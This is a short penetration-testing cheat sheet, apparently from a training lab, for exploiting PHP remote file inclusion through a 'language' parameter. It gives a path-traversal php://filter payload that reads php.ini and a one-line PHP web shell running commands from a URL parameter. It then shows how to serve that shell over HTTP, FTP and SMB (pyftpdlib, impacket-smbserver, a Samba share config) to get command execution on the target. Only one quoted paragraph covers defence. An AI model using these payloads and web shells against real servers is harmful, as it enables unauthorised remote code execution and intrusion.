# Verify RFI

RFI over the `http://` and `ftp://` wrappers depends on `allow_url_include` being enabled, so first read `php.ini` through the `php://filter` wrapper and check that setting in the decoded output.

```bash
http://$IP:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

echo '<base64>' | base64 -d | grep allow_url_include
```

```bash
/index.php?language=http://127.0.0.1:80/index.php
```

# HTTP + PHP

```bash
<?php phpinfo(); ?>
<?php system('whoami'); ?>
<?php system($_GET['cmd']); ?>

cat << EOF > shell.php
<?php system($_GET['cmd']); ?>
EOF
```

# FTP

```bash
sudo python -m pyftpdlib -p 21

ftp://<IP>/shell.php&cmd=id

# if the server requires valid authentication
curl '.../index.php?language=ftp://user:pass@localhost/shell.php?cmd=id'
```

# Samba SMB server

> If the vulnerable web application is hosted on a Windows server, RFI does not require the `allow_url_include` setting to be enabled, because the file can be included over SMB. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path.
>
> For defenders, this means `allow_url_include = Off` is not sufficient on a Windows host: the `language` parameter has to be validated (for example against an allowlist of page names) and outbound SMB from the web server restricted.

##### 1

```bash
impacket-smbserver -smb2support share $(pwd)

/index.php?language=\\<IP>\share\shell.php&cmd=whoami
```

##### 2

```bash
[wook]
path = /home/kali/wook
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```

```bash
# change the directory and run the commands
cd /home/kali/wook
chmod 0555 /home/kali/wook
sudo chown -R nobody:nogroup /home/kali/wook
```

```bash
sudo service smbd restart
```

```bash
# check if our server is running
smbmap -H <my_IP>
```